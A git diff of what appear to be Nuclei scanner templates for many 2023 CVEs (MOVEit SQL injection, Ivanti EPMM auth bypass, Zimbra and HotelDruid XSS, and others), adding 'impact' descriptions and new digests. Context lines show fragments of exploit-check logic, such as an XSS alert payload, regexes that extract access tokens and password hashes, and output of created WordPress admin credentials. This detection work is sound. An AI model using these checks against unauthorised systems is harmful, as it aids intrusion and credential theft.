index 86c5ba7929..f63a146e5a 100644
--- a/http/cves/2023/CVE-2023-33439.yaml
+++ b/http/cves/2023/CVE-2023-33439.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id=
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
           - 'contains(body, "Fatal error:")'
           - 'contains(body, "XPATH syntax error:")'
         condition: and
-# digest: 4a0a0047304502204b7c860c3dd0484e8903291119dc2f975a1a68b590b555aa4cdb3aa878e2b326022100885e28b223e1a08b73f3cf550a90e317951eb0dbee2b8fed00fff8284a0b1a9a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201493389592fb1d9a55fcbde7c5299ae9b9a95c3f367b19d827a1248d793eb5f7022041c52ed9cc8ad1f94c3e18f47246a333212bcf89d7538f47aaafed54737ce8d5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml
index c53c622ac7..8e56092c29 100644
--- a/http/cves/2023/CVE-2023-33440.yaml
+++ b/http/cves/2023/CVE-2023-33440.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability.
   reference:
@@ -80,4 +82,4 @@ http:
           - 'len(body_1) == 1'
           - 'contains(body_2, "Faculty Evaluation")'
         condition: and
-# digest: 490a004630440220613f7b596dac3aecb24546f083fc5ea187e0ae0bac10e8a004a2a90334701061022071d52ffbf3c477a2193ec66193863905a616b28112ffce0b68a26e640ff7331a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e6e1f25654685329fc8395f34becf337a35a04e8fa225af7448236a6648152d702203470108dad8c7f91a49802ad527997ce8018cca1915a49c28ff00ed17435f067:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml
index b2d086bf30..3db018a6e5 100644
--- a/http/cves/2023/CVE-2023-3345.yaml
+++ b/http/cves/2023/CVE-2023-3345.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints.
+  impact: |
+    An attacker can gain unauthorized access to sensitive information.
   remediation: |
     Upgrade LMS by Masteriyo to version 1.6.8 or higher to fix the vulnerability.
   reference:
@@ -73,4 +75,4 @@ http:
         regex:
           - '"nonce":"([a-z0-9]+)","versionString'
         internal: true
-# digest: 4a0a004730450220125363f3f7cc9653f1a68ffc352f6faa783bac382eac70d40ac8eaac5257c177022100e561b6d2ce9c59e2dfaca0543f7077d6aedad58e3ba0a64ddbe2b005730451de:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009cfd0f8fd54f36abb0c1cc38c3dc14a622251ce2a171be051662cdbfb2f57cab022100857f189c879a0806d993a8967948b613fa277b63464b213dd7eccf251549c30a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-33510.yaml b/http/cves/2023/CVE-2023-33510.yaml
index 10fd59b7bf..39e8c74ebb 100644
--- a/http/cves/2023/CVE-2023-33510.yaml
+++ b/http/cves/2023/CVE-2023-33510.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in Jeecg P3 Biz Chat.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402207150971d134298ec200da86637edc787d30ab7650a50c23b8dac5f37f21ed56a02202da783c74e783ed5a98b1d2b747b2b77bca0457af5ef1383bd2f65b6228d4479:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f70eb10cbb768a49e10b3e96d8c8689acefe31ee25f04ad5ef8de264aa03ead9022100c9e22d85f2b09b8056bb58c50f7efb40601251c773b6a8e79660797264e1dbbe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-33568.yaml b/http/cves/2023/CVE-2023-33568.yaml
index f86e1bbba0..6d0874edbb 100644
--- a/http/cves/2023/CVE-2023-33568.yaml
+++ b/http/cves/2023/CVE-2023-33568.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.
+  impact: |
+    The attacker can access and steal sensitive information from the contacts database, potentially leading to data breaches and privacy violations.
   remediation: |
     Apply the latest security patch or upgrade to a patched version of Dolibarr to mitigate the vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022069c9ae46383aa83d98616fef4498a9f56de8d2686723b53b35587741d6e1337d022100824370e072482dd4fe68350dd70155c647056a6bc56e09f980347321fb48e337:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203b4e49eab81368748dc2761faa06896e9ced1bdaf2544db8ab564daa8a8647ce0220341406a199ba560b827ca6623f5719b573145ff28adc919aefe0531420ec3679:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-34124.yaml b/http/cves/2023/CVE-2023-34124.yaml
index 74704b0224..48cc8354f9 100644
--- a/http/cves/2023/CVE-2023-34124.yaml
+++ b/http/cves/2023/CVE-2023-34124.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
   remediation: |
     Apply the latest security patches or updates provided by SonicWall to mitigate this vulnerability.
   reference:
@@ -88,4 +90,4 @@ http:
         group: 1
         regex:
           - "getPwdHash.*,'([0-9]+)'"
-# digest: 4a0a0047304502200407d45731593143bad47a203faef04ea84d8605917ac98f9be3c55944194b23022100cc8e1c32eb78cfe65d129de0c0587872ace89432de003d3813febd069e745252:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c746ddb95d3622c28bda15777bee4644158d025d9d2367aa73a28b076171dc0f022100c40dc10e703fe68913a539d274f9038a22e201bcecb6d345a416baa07aa72615:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml
index 0dba4ecee9..5069af60bd 100644
--- a/http/cves/2023/CVE-2023-34192.yaml
+++ b/http/cves/2023/CVE-2023-34192.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS).
   reference:
@@ -60,4 +62,4 @@ http:
         part: header_2
         status:
           - 200
-# digest: 4a0a00473045022052ffe5c0d4a1192bfc24cd4443c6abc55dfbc341c348c28466e1e3b55f7c3b310221009be8cd0b72632682f3c1703ebe283b7a16dc7eaf9d8f45cb38c4c72c894e1e86:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220696161217cf3b94e32ae8939344936284ccee67d255b4bc22ca26368f9bb4e19022100dcb379d60bcb68f084f5a2daadf0503552b26306a29ce91fc1e0b77d0bad035c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml
index 9d863e0b89..09ac79e066 100644
--- a/http/cves/2023/CVE-2023-34362.yaml
+++ b/http/cves/2023/CVE-2023-34362.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the entire server.
   remediation: |
     Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability.
   reference:
@@ -128,4 +130,4 @@ http:
         regex:
           - '"access_token":"([^"]+)"'
         part: body
-# digest: 4a0a00473045022100cbfacf65b1712670a998b1b84ed0a5cfc4357e57b455700b5deab8b77555b6f602204f073a7e3553570f4a5ddfb0a27ba36292344955a4251c61cc4539a5ac2cd056:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022067df8fad42ef5baa892db2050ce3c3a2c796c51bce56b8e3a80f1cebaf9f9077022063d954362e3c5ba41f4c4df71517078a8e487e166b0a60ef00572aab0f09a643:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml
index 6195ff4c69..3ac1311c9e 100644
--- a/http/cves/2023/CVE-2023-34537.yaml
+++ b/http/cves/2023/CVE-2023-34537.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
           - 'contains(body_2, "<script>alert(document.domain)</script>")'
           - 'contains(body_2, "HotelDruid")'
         condition: and
-# digest: 490a0046304402206cb124be20732d01d837613041b59cd8760e49ff741df7391a33f7c6f162d2d3022064de90c09611505916bee17662b318f3c5a9c854fe2db7ab9f20ba8be71874c7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c830aca777226bc249821265786fea9e71fb509f8fadd50fa75ee007d8d5f6e7022100923192dbb01ee2dab975cb0ef192347547933818ae7046f114b76034810385fd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml
index ddad15efce..ab95f734a6 100644
--- a/http/cves/2023/CVE-2023-34598.yaml
+++ b/http/cves/2023/CVE-2023-34598.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response.
+  impact: |
+    The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.
   remediation: |
     Upgrade to a patched version of Gibbon or apply the necessary security patches to mitigate the LFI vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100de003d52e2bb30ef2e784210cc942ea9f3670860798072c338108ec8679421160221008a50acd77a3ef4f74c524bdb1f75457b77cc043d58ca02e9a537d9ac2b8cf985:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e74ec719ba6cc96b5fbb11a62a10a6cf929acf7e512c5c4bea642a307fca0ada022100df6b7ca6fbd3f4db15c8dbe82d7359c92264b2b8da3f37824676cb9790bd721a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml
index def0893b67..1857a317c4 100644
--- a/http/cves/2023/CVE-2023-34599.yaml
+++ b/http/cves/2023/CVE-2023-34599.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
   reference:
@@ -80,4 +82,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ea4a071bbebe7c0b5b6ae5a9c76e6972e5d5eeaa4e89a11fbd6329f77f486ba4022100f51498dd1a7bfb71a8a42ce258a8c00d977364a2782cafd50aa69579a9e9a6a4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fffdd22de4e7ab9d7d106e16b7c6e1c8e1c5ca41b2e72b1b5e17e8efe83155e702207417228b8ee573c7a2cd022265f9c342c14b543d11d12dc1ace42e1d03d8337a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-3460.yaml b/http/cves/2023/CVE-2023-3460.yaml
index b6186ae8cb..725933c86f 100644
--- a/http/cves/2023/CVE-2023-3460.yaml
+++ b/http/cves/2023/CVE-2023-3460.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The plugin does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild.
+  impact: |
+    Unauthenticated users can gain unauthorized access and perform actions with elevated privileges.
   remediation: |
     Upgrade to Ultimate Member version 2.6.7 or later.
   reference:
@@ -101,4 +103,4 @@ http:
         dsl:
           - '"WP_USERNAME: "+ username'
           - '"WP_PASSWORD: "+ password'
-# digest: 4a0a00473045022100c9d5b9ac91bb2cf3412853c2ab277890578a1303a76f506286ca9011f089e5b902200509a7019db59af3d2e57ad78aa1538adbd57dcc05cc987c90d3cb226c3e2097:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220399e6ebcc5b61ddd2db7549cd1411f1719c01d6327c14c40d4b46b4db0d7768b02202a953cd9099c5b7639d312fd9fe8a8647485d13b760e1b552752c0f3e7938f91:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml
index cf7f5bed48..9f1d3c5856 100644
--- a/http/cves/2023/CVE-2023-34659.yaml
+++ b/http/cves/2023/CVE-2023-34659.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the id parameter of the /jeecg-boot/jmreport/show interface.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade JeecgBoot to a patched version or apply the necessary security patches provided by the vendor.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100da52675da8d77979a00ea0d70bb2b685b7ef0721553f58565623c3bf66a149cb022100d40e6a306391cbf87fce6b2d38bb263f06211dda2fc3f740b7cb8d69918e18b1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c137c6cae608f000b79e584b7893ddcb0acd4561769855a74f1b43181b7eea02022100950595c2df6f8617e1a6f1ace58029f06576ab691fb700659a1b42e1304cb6df:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml
index b6304e2023..baec900a98 100644
--- a/http/cves/2023/CVE-2023-3479.yaml
+++ b/http/cves/2023/CVE-2023-3479.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of Hestiacp (1.7.8 or higher) to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a8acb6eac0ea4df5b48121b6c2d8211d5721b7b75795ce409a8229533e012fec0221008c06b5643877cf98478c07bd0bfa5e7f7998df11eae0c19b22fdc8dee2924368:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204205c93822b2658366bda4d0255796f7e3a04c1c4b0e0a9cf0d0236696bccc4e022049ba5f6d455485f30f38b3c1f9b8e56b6380e75a931054a6a77c8f55cec8022c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml
index 36e781bdca..e04ca3a5fc 100644
--- a/http/cves/2023/CVE-2023-34843.yaml
+++ b/http/cves/2023/CVE-2023-34843.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     traggo/server version 0.3.0 is vulnerable to directory traversal.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the server.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203e8087805854de495749c8a3dd79903703bc1b63a6021a107eabca6e132d4ae8022100e895d5ac6c5936400925e8f317673f1ecd4d20df7b92663e0291012c62f86c3f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009de8c6d97c89bb2d7738e1fa0009560f0160251f3fd887ca9c0515d40c811aa9022100a8c257ec3f0dc6a63c60974e97aa1e91b347c724ebf577e2ce34299fa7abb2b0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml
index d8731f8642..a1c000aaa1 100644
--- a/http/cves/2023/CVE-2023-34960.yaml
+++ b/http/cves/2023/CVE-2023-34960.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the command injection vulnerability in Chamilo LMS.
   reference:
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221009c91e223c3c372c955f8f94a45e003075f67bbaf288035359ca91281fc30ebc1022100cdd09ea79cc4266bef1cc04e1087dddca32365fe5d0a1cea723af978e980fbf3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100941bee8edb906b784803809eb96b8b9f6f6c040031bc504ffefaded57cee2b8802201783dbfc0007bc1d81ca8213c3c70dcd803602d0bce47870fa1f669f6e2f6317:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-35078.yaml b/http/cves/2023/CVE-2023-35078.yaml
index fd0c29e402..38a2c264d0 100644
--- a/http/cves/2023/CVE-2023-35078.yaml
+++ b/http/cves/2023/CVE-2023-35078.yaml
@@ -5,6 +5,8 @@ info:
   author: parth,pdresearch
   severity: critical
   description: Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system.
   remediation: |
     Apply the latest security patches or updates provided by Ivanti to fix the authentication bypass vulnerability in Endpoint Manager Mobile (EPMM).
   reference:
@@ -43,4 +45,4 @@ http:
           - contains(header, 'application/json')
           - status_code == 200
         condition: and
-# digest: 4b0a00483046022100bd7c8d5898607db8f10de6acf7ef220a9eebcdf810c213ff0cfb4d301dc8d82d02210091574ff86825f9e02081f08894ce24c0b01745278530291036bf495f618036ea:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207b2bd03aa0ace48cbe69f828595d697e956f04f57954c86d016762220ca3547c022100aac4f48b755a844005b7f3b4ead77d80fb829ea8d96a806500f4deb9aba56405:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml
index 53464b3909..304e4b9c44 100644
--- a/http/cves/2023/CVE-2023-35082.yaml
+++ b/http/cves/2023/CVE-2023-35082.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain.
+  impact: |
+    Remote attackers can exploit this vulnerability to gain unauthorized access to sensitive data and perform malicious actions.
   remediation: Upgrading to the latest version of Ivanti Endpoint Manager Mobile (EPMM)
   reference:
     - https://www.rapid7.com/blog/post/2023/08/02/cve-2023-35082-mobileiron-core-unauthenticated-api-access-vulnerability/
@@ -41,4 +43,4 @@ http:
           - contains(header, 'application/json')
           - status_code == 200
         condition: and
-# digest: 4a0a0047304502202dd5de940253afa7cf8eb908333e344772087f7ff7c66e97a78014aac8108c8a022100fc3512e1f78983ab8990a5ef659851668e7bb5d63ccee336e434a4dc4cb0b291:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022036fe3d709f9e0c41d537d05596be8fec95fbe9e69814f9e906a355b66d6bc3fb02203d0ce34d8f1b8af985b99fe526c16caf677c5ffbb0d3046c402f275a9d73525d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml
index 71ce094141..d312c77220 100644
--- a/http/cves/2023/CVE-2023-35843.yaml
+++ b/http/cves/2023/CVE-2023-35843.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.
+  impact: |
+    The vulnerability can lead to unauthorized access to sensitive information, potentially exposing user credentials, database contents, and other confidential data.
   remediation: |
     Upgrade NocoDB to a version higher than 0.106.1 to mitigate the vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022060c545611ff49ab905fc451bdaea38f154546cdf97fcfb2585592532f639530d022100cb90b709d0740014cd5e75b0105645dd64c4e968a448cc778a31669e12076c54:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203b8fc6bd6ad52e41c0971e57a701b4346b52933c7536d36d7e4e093c4d09fbfb022100849ee5337c6477d2008aea57bdc35ccbc85add980914eb47629ecbd8662ff37e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml
index 96352d8a4b..3c563047bb 100644
--- a/http/cves/2023/CVE-2023-35844.yaml
+++ b/http/cves/2023/CVE-2023-35844.yaml
@@ -9,6 +9,8 @@ info:
     has insecure file endpoints, e.g., they allow .. directory
     traversal and do not ensure that an intended file extension
     (.csv or .png) is used.
+  impact: |
+    The vulnerability can lead to unauthorized access to sensitive information, potentially exposing user credentials, database credentials, and other confidential data.
   remediation: |
     Upgrade Lightdash to a version higher than 0.510.3 to mitigate the vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f13ac636c53ddc707d470c43950c4b2a5c95adc0ca8dcbb5de1d3f0b16375d2d022034366205772126fcfceadfc77f84139eb349aa7d3cbd256fe559db1782bc86da:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b98be974314855c0fa4c1d84a5bcf76728419e1249b94742287f32a1d593b7d7022100f37a49ed95c30329c49c17aaff35e311c8a58faf75856e5f1736136e9ac4925e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml
index a3325c33de..261ded83b5 100644
--- a/http/cves/2023/CVE-2023-35885.yaml
+++ b/http/cves/2023/CVE-2023-35885.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade Cloudpanel to version 2.3.1 or later to mitigate this vulnerability.
   reference:
@@ -68,4 +70,4 @@ http:
       - type: dsl
         dsl:
           - body_5 == str2
-# digest: 490a00463044022076dc21bd12b1f07d983bb2ad86e20f2f14394e15942e7f3812147ce6d3bafcf602206ae5c26ad9d4a3507519103d6e9b5bee0b4f2f6f0dea6490f94d3b62165eef40:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ca9bae0f21f135ae9c76b7a3dbd83bd86f11d0d4699286886340a96be8e40022022100fc7988d8a74c81c7e6403be773d317ab23d20e7809d2c0dbb37f23b90a5db2bd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml
index 9553329420..058831dc9e 100644
--- a/http/cves/2023/CVE-2023-36287.yaml
+++ b/http/cves/2023/CVE-2023-36287.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     To remediate this issue, it is recommended to apply the latest security patches or updates provided by the vendor.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203d8b95626006748e4a6a7656f0b95a24db3e8385d6145c5c6af134b8885b3671022100df3fc3749f23864071029e1b0347dd4f39e1fb938d8a9974ec61e6eec89aa1eb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009069edc5bc3de0436ccc857ac5e67b96155a75fdc2ba969bf7f9b674711b4197022100b05117537935ae7a4be6966b3b1609b9955b716aafaf28e27eda83296d501f28:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml
index 4717fc23a1..bb8dc8850a 100644
--- a/http/cves/2023/CVE-2023-36289.yaml
+++ b/http/cves/2023/CVE-2023-36289.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     To remediate this issue, it is recommended to apply the latest security patches or updates provided by the vendor.
   reference:
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402201e111eb94c841eca97467110087c2cf2fcf2544819ffd9daab5ea403281e6b2d0220129a10f53e1a484ecb4f18840c32e6a27184bd9c84ea1de627e4280042701e14:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202661579ae35b9223ad8bfa615135508f890d186ac390fe25383ca2cdf47bd664022100d5de3f67ceceeb9a199a1cda02713dba07162a9010bbecdbfbe12d8b6ab3d844:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml
index fe7b71639d..da13af49ec 100644
--- a/http/cves/2023/CVE-2023-36346.yaml
+++ b/http/cves/2023/CVE-2023-36346.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.
+  impact: |
